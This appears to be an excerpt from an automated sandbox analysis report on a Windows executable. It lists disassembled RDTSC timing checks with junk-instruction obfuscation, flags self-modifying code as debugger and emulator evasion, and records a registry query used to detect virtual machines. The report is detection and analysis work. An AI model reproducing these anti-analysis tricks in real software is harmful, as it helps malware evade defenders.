Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC02CD second address: 4DC02ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, AEE2h 0x00000007 mov bx, D72Eh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 mov esi, 4BFF80E1h 0x00000015 mov di, cx 0x00000018 popad 0x00000019 xchg eax, edi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC02ED second address: 4DC02F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC02F1 second address: 4DC0306 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DD4F81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC0306 second address: 4DC0316 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC064DA37BCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC0383 second address: 4DC03B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DD4F82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a test al, al 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC064DD4F87h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC0454 second address: 4DC04A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DA37C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FC064DA37BEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FC064DA37BCh 0x00000019 sbb cx, 0798h 0x0000001e jmp 00007FC064DA37BBh 0x00000023 popfd 0x00000024 push esi 0x00000025 pop ebx 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC050D second address: 4DC0513 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC0513 second address: 4DC0535 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DA37C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FC064DA3846h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC0535 second address: 4DC053B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC053B second address: 4DC055E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC064DA37C2h 0x00000008 mov dx, cx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e cmp dword ptr [ebp-14h], edi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 mov bh, ah 0x00000016 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC055E second address: 4DC059E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushfd 0x00000009 jmp 00007FC064DD4F87h 0x0000000e sbb eax, 0D23B7EEh 0x00000014 jmp 00007FC064DD4F89h 0x00000019 popfd 0x0000001a rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC059E second address: 4DC05C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DA37C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jne 00007FC0D5C0169Eh 0x00000010 pushad 0x00000011 mov ebx, ecx 0x00000013 mov edi, esi 0x00000015 popad 0x00000016 mov ebx, dword ptr [ebp+08h] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC05C9 second address: 4DC05CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC05CE second address: 4DC05EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC064DA37C9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC05EB second address: 4DC065E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-2Ch] 0x0000000b jmp 00007FC064DD4F7Dh 0x00000010 xchg eax, esi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FC064DD4F83h 0x0000001a and eax, 29190D6Eh 0x00000020 jmp 00007FC064DD4F89h 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007FC064DD4F80h 0x0000002c adc si, F0E8h 0x00000031 jmp 00007FC064DD4F7Bh 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC065E second address: 4DC0664 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC0664 second address: 4DC0668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC0668 second address: 4DC0680 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC064DA37BDh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC0680 second address: 4DC0685 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC0685 second address: 4DC06D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FC064DA37BFh 0x0000000f nop 0x00000010 jmp 00007FC064DA37C6h 0x00000015 push eax 0x00000016 pushad 0x00000017 mov eax, ebx 0x00000019 mov cx, bx 0x0000001c popad 0x0000001d nop 0x0000001e jmp 00007FC064DA37BFh 0x00000023 xchg eax, ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC06D4 second address: 4DC06D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC06D8 second address: 4DC06DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC06DC second address: 4DC06E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC0771 second address: 4DC0777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC0777 second address: 4DC07B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DD4F88h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC064DD4F87h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC07B0 second address: 4DC0034 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ebx, 6363E178h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d je 00007FC0D5C0164Eh 0x00000013 xor eax, eax 0x00000015 jmp 00007FC064D7CEEAh 0x0000001a pop esi 0x0000001b pop edi 0x0000001c pop ebx 0x0000001d leave 0x0000001e retn 0004h 0x00000021 nop 0x00000022 cmp eax, 00000000h 0x00000025 setne cl 0x00000028 xor ebx, ebx 0x0000002a test cl, 00000001h 0x0000002d jne 00007FC064DA37B7h 0x0000002f jmp 00007FC064DA38F3h 0x00000034 call 00007FC069162B21h 0x00000039 mov edi, edi 0x0000003b jmp 00007FC064DA37BBh 0x00000040 xchg eax, ebp 0x00000041 pushad 0x00000042 mov di, cx 0x00000045 jmp 00007FC064DA37C0h 0x0000004a popad 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FC064DA37BEh 0x00000053 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC0034 second address: 4DC004B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC064DD4F81h 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC004B second address: 4DC0071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007FC064DA37BDh 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC064DA37BDh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC0071 second address: 4DC00ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC064DD4F87h 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007FC064DD4F89h 0x0000000f adc si, 8166h 0x00000014 jmp 00007FC064DD4F81h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ecx 0x0000001e pushad 0x0000001f mov di, si 0x00000022 push eax 0x00000023 push edx 0x00000024 pushfd 0x00000025 jmp 00007FC064DD4F86h 0x0000002a sbb ch, 00000038h 0x0000002d jmp 00007FC064DD4F7Bh 0x00000032 popfd 0x00000033 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC0B25 second address: 4DC0B42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DA37C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC0B42 second address: 4DC0B8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DD4F81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC064DD4F7Ch 0x00000011 and ch, 00000048h 0x00000014 jmp 00007FC064DD4F7Bh 0x00000019 popfd 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FC064DD4F86h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC0B8D second address: 4DC0BA4 instructions: 0x00000000 rdtsc 0x00000002 mov ah, E4h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 mov dx, A5ECh 0x0000000d popad 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov edx, ecx 0x00000014 push esi 0x00000015 pop edx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC0BA4 second address: 4DC0BF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC064DD4F7Bh 0x00000008 push esi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 mov dl, ch 0x00000012 pushfd 0x00000013 jmp 00007FC064DD4F7Dh 0x00000018 adc ax, E726h 0x0000001d jmp 00007FC064DD4F81h 0x00000022 popfd 0x00000023 popad 0x00000024 cmp dword ptr [75C7459Ch], 05h 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov si, dx 0x00000031 mov eax, edx 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC0BF2 second address: 4DC0C35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DA37C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FC0D5BF15AFh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FC064DA37BDh 0x00000018 or cx, 29E6h 0x0000001d jmp 00007FC064DA37C1h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC0C35 second address: 4DC0C4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DD4F7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC0C4C second address: 4DC0C52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC0C52 second address: 4DC0C58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC0C58 second address: 4DC0C5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC0C99 second address: 4DC0CE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DD4F7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 2BF626FBh 0x00000010 jmp 00007FC064DD4F86h 0x00000015 call 00007FC0D5C29E23h 0x0000001a push 75C12B70h 0x0000001f push dword ptr fs:[00000000h] 0x00000026 mov eax, dword ptr [esp+10h] 0x0000002a mov dword ptr [esp+10h], ebp 0x0000002e lea ebp, dword ptr [esp+10h] 0x00000032 sub esp, eax 0x00000034 push ebx 0x00000035 push esi 0x00000036 push edi 0x00000037 mov eax, dword ptr [75C74538h] 0x0000003c xor dword ptr [ebp-04h], eax 0x0000003f xor eax, ebp 0x00000041 push eax 0x00000042 mov dword ptr [ebp-18h], esp 0x00000045 push dword ptr [ebp-08h] 0x00000048 mov eax, dword ptr [ebp-04h] 0x0000004b mov dword ptr [ebp-04h], FFFFFFFEh 0x00000052 mov dword ptr [ebp-08h], eax 0x00000055 lea eax, dword ptr [ebp-10h] 0x00000058 mov dword ptr fs:[00000000h], eax 0x0000005e ret 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007FC064DD4F87h 0x00000066 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC0CE3 second address: 4DC0D39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DA37C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esi, esi 0x0000000b jmp 00007FC064DA37C7h 0x00000010 mov dword ptr [ebp-1Ch], esi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push edx 0x00000017 pop eax 0x00000018 jmp 00007FC064DA37C7h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC0D6A second address: 4DC0DB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DD4F81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov eax, edx 0x00000010 pushfd 0x00000011 jmp 00007FC064DD4F7Fh 0x00000016 and eax, 76EEDCCEh 0x0000001c jmp 00007FC064DD4F89h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC0DB7 second address: 4DC0E31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DA37C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FC0D5BE736Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FC064DA37C3h 0x00000018 or ecx, 7CB5078Eh 0x0000001e jmp 00007FC064DA37C9h 0x00000023 popfd 0x00000024 pushfd 0x00000025 jmp 00007FC064DA37C0h 0x0000002a jmp 00007FC064DA37C5h 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC0E31 second address: 4DC0E37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC0E37 second address: 4DC0E3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC0E3B second address: 4DC0E3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC0E3F second address: 4DC0E62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp+08h], 00002000h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC064DA37C2h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DD0B36 second address: 4DD0B3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DD0B3A second address: 4DD0B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DD0B40 second address: 4DD0B6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DD4F82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b mov esi, 7C9837CDh 0x00000010 mov bl, cl 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC064DD4F7Bh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DD0B6E second address: 4DD0B9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 19h 0x00000005 pushfd 0x00000006 jmp 00007FC064DA37C0h 0x0000000b xor si, 3348h 0x00000010 jmp 00007FC064DA37BBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, esi 0x0000001a pushad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DD0B9D second address: 4DD0BCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FC064DD4F80h 0x00000009 pop esi 0x0000000a popad 0x0000000b mov ah, bh 0x0000000d popad 0x0000000e mov esi, dword ptr [ebp+0Ch] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 call 00007FC064DD4F7Fh 0x00000019 pop eax 0x0000001a mov eax, ebx 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DD0BCF second address: 4DD0BD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DD0BD4 second address: 4DD0BF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, A0DDh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC064DD4F82h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DD0BF7 second address: 4DD0C06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DA37BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DD0C06 second address: 4DD0C0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DD0C0C second address: 4DD0C10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DD0C10 second address: 4DD0CD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FC0D5C12715h 0x0000000e jmp 00007FC064DD4F87h 0x00000013 cmp dword ptr [75C7459Ch], 05h 0x0000001a pushad 0x0000001b mov di, ax 0x0000001e pushad 0x0000001f jmp 00007FC064DD4F7Eh 0x00000024 pushfd 0x00000025 jmp 00007FC064DD4F82h 0x0000002a jmp 00007FC064DD4F85h 0x0000002f popfd 0x00000030 popad 0x00000031 popad 0x00000032 je 00007FC0D5C2A793h 0x00000038 pushad 0x00000039 movzx ecx, dx 0x0000003c pushfd 0x0000003d jmp 00007FC064DD4F89h 0x00000042 or ecx, 691CB0A6h 0x00000048 jmp 00007FC064DD4F81h 0x0000004d popfd 0x0000004e popad 0x0000004f xchg eax, esi 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FC064DD4F88h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DD0CD4 second address: 4DD0CDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DD0CDA second address: 4DD0CFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DD4F7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC064DD4F7Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DD0CFD second address: 4DD0D12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DA37BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DD0D12 second address: 4DD0D19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DD0D44 second address: 4DD0D61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DA37C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DD0D61 second address: 4DD0DE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC064DD4F87h 0x00000009 sbb ch, 0000000Eh 0x0000000c jmp 00007FC064DD4F89h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007FC064DD4F80h 0x00000018 adc ch, FFFFFF88h 0x0000001b jmp 00007FC064DD4F7Bh 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 call 00007FC064DD4F82h 0x0000002d pop esi 0x0000002e call 00007FC064DD4F7Bh 0x00000033 pop esi 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DD0DE0 second address: 4DD0E01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DA37C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DD0E01 second address: 4DD0E05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DD0E05 second address: 4DD0E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DD0E77 second address: 4DD0E7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DD0E7D second address: 4DD0E81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\JqGBbm7.exe	Special instruction interceptor: First address: A26C5D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\JqGBbm7.exe	Special instruction interceptor: First address: BEEDE8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\JqGBbm7.exe	Special instruction interceptor: First address: A26B5F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\JqGBbm7.exe	Special instruction interceptor: First address: BD7659 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\JqGBbm7.exe	Special instruction interceptor: First address: C5A46D instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\JqGBbm7.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
